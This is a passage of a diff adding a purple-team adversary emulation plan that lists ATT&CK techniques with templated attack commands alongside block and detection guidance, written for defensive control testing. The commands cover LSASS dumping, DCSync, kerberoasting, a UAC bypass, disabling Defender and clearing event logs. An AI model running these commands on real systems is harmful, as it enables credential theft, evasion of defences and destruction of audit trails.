+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Register Security Service Provider (SSP) in LSASS","T1547.005","Credential Access","Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS."
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over FTP","T1048.003","Exfiltration","Exfiltrate data from the internal network to an external system via FTP"
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via Registry ""Run"" key","T1547.001","Persistence","Run a payload during user login and startup by setting a registry run key"
+"Persist via new local administrator","T1136.001","Persistence","Create a new local user then add them to the ""Administrators"" group using the builtin net.exe"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
diff --git a/h-index-2024/h-index-2024-v1.0.yml b/h-index-2024/h-index-2024-v1.0.yml
new file mode 100644
index 0000000..f8691a6
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0.yml
@@ -0,0 +1,1040 @@
+Initial Access:
+- name: Prompt a user with multiple MFA requests
+  description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+  platforms:
+  guidance:
+  block:
+  - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+  detect:
+  - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+  controls:
+  - IdP
+  metadata:
+    id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    tid: T1621
+    tactic: TA0006
+    x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    isv: 1
+- name: Attachment - Macro
+  description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+  platforms:
+  guidance:
+  - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+    isv: 1
+- name: Attachment - ISO
+  description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    isv: 1
+- name: Link - Zipped DLL via sharing
+  description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+  platforms:
+  guidance:
+  - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+    tid: T1566.002
+    tactic: TA0001
+    x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+    isv: 1
+- name: Suspicious external employee login
+  description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+  platforms:
+  guidance:
+  block:
+  - Suspicious logins originating from select geolocations are blocked
+  detect:
+  - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  - IdP
+  metadata:
+    id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    isv: 1
+- name: Suspicious service use
+  description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  metadata:
+    id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+  description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+  platforms:
+  - windows
+  guidance:
+  - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+  block:
+  - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+  - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+  - https://www.loldrivers.io/
+  - Anomalous driver load blocked by endpoint security tool
+  detect:
+  - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+  controls:
+  - Hardening
+  - Endpoint Protection
+  metadata:
+    id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    tid: T1014
+    tactic: TA0005
+    x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    isv: 1
+- name: DLL execution using Rundll32
+  description: Execute a malicious DLL's function directly using rundll32
+  platforms:
+  - windows
+  guidance:
+  - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    tid: T1218.011
+    tactic: TA0005
+    x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+  description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+  - cmd> c:\windows\system32\fodhelper.exe
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    tid: T1548.002
+    tactic: TA0004
+    x_references:
+    - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+    x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    isv: 1
+- name: Clear Windows Event Log entries
+  description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+  platforms:
+  - windows
+  guidance:
+  - CMD> wevtutil clear-log Security
+  - CMD> wevtutil clear-log Application
+  - CMD> wevtutil clear-log System
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    tid: T1070.001
+    tactic: TA0005
+    x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    isv: 1
+- name: Sideload a DLL into a legitimate application
+  description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+  platforms:
+  - windows
+  guidance:
+  - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 2496e250-5757-482f-9661-daea872395ae
+    tid: T1574.002
+    tactic: TA0005
+    x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+    isv: 1
+- name: Disable Windows Defender via PowerShell
+  description: Use PowerShell's Set-MpPreference to disable Windows Defender
+  platforms:
+  - windows
+  guidance:
+  - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+  - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    tid: T1562.001
+    tactic: TA0005
+    x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    isv: 1
+- name: Modify identity policy in IdP
+  description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    tid: T1484
+    tactic: TA0003
+    x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    isv: 1
+Collection:
+- name: Screen Capture
+  description: Capture an image of the user's screen
+  platforms:
+  guidance:
+  - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    tid: T1113
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+    x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    isv: 1
+- name: Keylogger
+  description: Log user keystrokes
+  platforms:
+  - windows
+  guidance:
+  - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    tid: T1056.001
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+    x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+  description: Use nltest.exe to identify domain controllers in the domain
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /dclist:{{ domain }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    tid: T1018
+    tactic: TA0007
+    x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    isv: 1
+- name: Domain trust discovery via nltest
+  description: Identify domain trust relationships using nltest.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /domain_trusts /all_trusts
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    tid: T1482
+    tactic: TA0007
+    x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+    isv: 1
+- name: Enumerate domain groups and users using net
+  description: Enumerate domain users and domain groups using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> net user /domain
+  - cmd> net group /domain
+  - cmd> net group "Domain Admins" /domain
+  - cmd> net group "Domain Computers" /domain
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    tid: T1087.002
+    tactic: TA0007
+    x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    isv: 1
+- name: BloodHound DC enumeration
+  description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+  platforms:
+  guidance:
+  - cmd> SharpHound.exe -c DcOnly
+  block:
+  - ''
+  detect:
+  - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+  - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+  - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: 672f8861-c914-4f58-b861-5107ce19f61c
+    tid: T1087.002
+    tactic: TA0007
+    x_tools:
+    - https://github.com/BloodHoundAD/SharpHound
+    x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+    isv: 1
+- name: Internal network scan using Net Scan
+  description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+  platforms:
+  - windows
+  guidance:
+  - cmd> {{ netscan_binary }}
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+  controls:
+  - ID/PS
+  - Firewall
+  - SIEM
+  - Application Control
+  metadata:
+    id: 3f120c23-78c0-462f-808f-38ef4f607233
+    tid: T1046
+    tactic: TA0007
+    x_tools:
+    - https://www.softperfect.com/products/networkscanner/
+    x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+    isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    isv: 1
+- name: HTTPS C2 over tcp/443
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    isv: 1
+- name: Access via remote assistance tool
+  description: Establish connection to system using a legitimate remote assistance application
+  platforms:
+  guidance:
+  block:
+  - Block the installation and use of unapproved third-party utilities via application control software
+  - Connections to known remote access service domains/IPs are blocked
+  - Remote access connection attempts originating from users outside of the tenant are blocked
+  detect:
+  - Connections to known remote access service domains/IPs are detected
+  controls:
+  - Application Control
+  - ID/PS
+  - Firewall
+  metadata:
+    id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    tid: T1219
+    tactic: TA0011
+    x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    isv: 1
+- name: Remote tool download over HTTP
+  description: Download a tool from a public hosting location onto the victim system
+  platforms:
+  guidance:
+  block:
+  - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+  detect:
+  - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    tid: T1105
+    tactic: TA0011
+    x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+  description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+  platforms:
+  - windows
+  guidance:
+  - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+  block:
+  - ''
+  detect:
+  - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+  - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    tid: T1003.006
+    tactic: TA0006
+    x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    isv: 1
+- name: Extract Logonpasswords via Nanodump
+  description: Use nanodump to extract credentials from LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> nanodump.exe --duplicate -w {{ out_file }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+  description: Use ProcDump from Sysinternals to dump LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - CMD> procdump -ma lsass.exe dump
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  - Application Control
+  metadata:
+    id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    tid: T1003.001
+    tactic: TA0006
+    x_tools:
+    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+    x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+  description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+  platforms:
+  - windows
+  guidance:
+  - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    isv: 1
+- name: Extract browser cookies
+  description: Extract cookie information from the user's browser
+  platforms:
+  - windows
+  guidance:
+  - cmd> SharpChrome.exe cookies
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 95790889-fb7d-42af-a221-3535e4197cde
+    tid: T1555.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/SharpDPAPI
+    x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+    isv: 1
+- name: Volumetric Kerberoasting
+  description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+  platforms:
+  guidance:
+  - cmd> Rubeus.exe kerberoast
+  block:
+  - ''
+  detect:
+  - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    tid: T1558.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/Rubeus
+    x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    isv: 1
+- name: Enabled WDigest via Registry
+  description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+  block:
+  - Suspicious Registry modification blocked by endpoint security tool
+  detect:
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    tid: T1112
+    tactic: TA0005
+    x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    isv: 1
+- name: Register Security Service Provider (SSP) in LSASS
+  description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+  platforms:
+  - windows
+  guidance:
+  - shell> {{ ssp_loader }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+  detect:
+  - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+  - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    tid: T1547.005
+    tactic: TA0006
+    x_references:
+    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+    x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    isv: 1
+Lateral Movement:
+- name: Lateral Movement via WMI
+  description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+  platforms:
+  - windows
+  guidance:
+  - CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    tid: T1021.003
+    tactic: TA0008
+    x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    isv: 1
+- name: Lateral Movement via PsExec
+  description: Move to another system by creating a service remotely via Sysinternals PsExec
+  platforms:
+  - windows
+  guidance:
+  - CMD> psexec -s \{{ target }} {{ command }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    tid: T1021.002
+    tactic: TA0008
+    x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    isv: 1
+- name: Lateral Movement via RDP
+  description: Perform an interactive logons to a Windows system via RDP
+  platforms:
+  - windows
+  guidance:
+  - CMD> mstsc /v:{{ target }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    tid: T1021.001
+    tactic: TA0008
+    x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    isv: 1
+- name: Remote .exe copy
+  description: Copy an .exe payload to a temp folder on the remote target
+  platforms:
+  guidance:
+  - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
